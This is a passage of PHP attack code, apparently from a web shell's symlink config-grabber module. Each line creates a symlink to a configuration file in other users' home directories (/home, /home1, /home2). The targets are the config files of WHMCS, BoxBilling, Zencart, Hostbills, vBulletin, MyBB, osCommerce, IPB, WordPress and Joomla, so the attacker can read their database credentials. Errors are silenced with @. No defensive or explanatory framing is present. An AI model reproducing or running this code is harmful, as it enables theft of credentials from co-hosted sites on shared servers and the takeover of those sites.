1381. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1382. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1383. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1384. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1385. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1386. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1387. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1388. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1389. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1390. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1391. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1392. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1393. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1394. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1395. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1396. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1397. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1398. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1399. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1400. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1401. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1402. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1403. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1404. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1405. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1406. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1407. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1408. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1409. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1410. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1411. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1412. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1413. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1414. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1415. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1416. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1417. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1418. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1419. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1420. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1421. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1422. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1423. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1424. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1425. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1426. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1427. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1428. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1429. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1430. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1431. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1432. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1433. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1434. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1435. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1436. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1437. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1438. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1439. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1440. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
1441. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
1442. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
1443. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
1444. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
1445. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
1446. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
1447. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
1448. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
1449. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
1450. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
1451. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
1452. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
1453. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
1454. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
1455. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
1456. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
1457. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
1458. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
1459. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
1460. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
1461. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
1462.  
1463. //Home1
1464.  
1465. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1466. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1467. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1468. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1469. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1470. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1471. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1472. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1473. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1474. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1475. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1476. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1477. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1478. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1479. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1480. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1481. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1482. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1483. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1484. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1485. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1486. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1487. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1488. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1489. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1490. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1491. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1492. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1493. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1494. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1495. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1496. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1497. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1498. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1499. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1500. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1501. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1502. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1503. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1504. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1505. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1506. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1507. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1508. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
1509. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1510. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1511. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1512. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1513. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1514. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1515. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1516. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1517. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1518. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1519. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1520. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1521. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1522. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1523. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1524. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1525. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1526. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1527. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1528. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1529. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1530. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1531. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1532. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1533. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1534. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1535. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1536. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1537. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1538. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1539. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1540. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1541. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1542. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1543. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1544. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1545. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1546. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1547. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1548. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1549. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1550. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1551. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1552. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1553. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1554. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1555. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1556. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
1557. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1558. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
1559. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1560. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1561. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1562. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1563. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
1564. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1565. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1566. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1567. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1568. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1569. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1570. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1571. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1572. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1573. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1574. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1575. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1576. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1577. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1578. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1579. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1580. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1581. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1582. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1583. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1584. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1585. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1586. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1587. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1588. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1589. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1590. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1591. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1592. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1593. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1594. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1595. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1596. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1597. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1598. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1599. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1600. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1601. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1602. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1603. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1604. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1605. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1606. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1607. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1608. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1609. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1610. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1611. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1612. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1613. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1614. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1615. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1616. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1617. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1618. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1619. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1620. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1621. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1622. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1623. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
1624. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
1625. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
1626. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
1627. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
1628. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
1629. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
1630. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
1631. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
1632. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
1633. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
1634. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
1635. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
1636. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
1637. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
1638. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
1639. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
1640. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
1641. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
1642. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
1643. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
1644. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
1645.  
1646. //Home2
1647.  
1648. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1649. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1650. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1651. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1652. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1653. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1654. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1655. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1656. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1657. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1658. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1659. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1660. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1661. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1662. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1663. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1664. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1665. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1666. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1667. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1668. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1669. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1670. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1671. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1672. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1673. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1674. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1675. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1676. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1677. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1678. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1679. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1680. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1681. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1682. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1683. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1684. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1685. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1686. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1687. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1688. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1689. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1690. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1691. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
1692. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1693. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1694. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1695. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1696. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
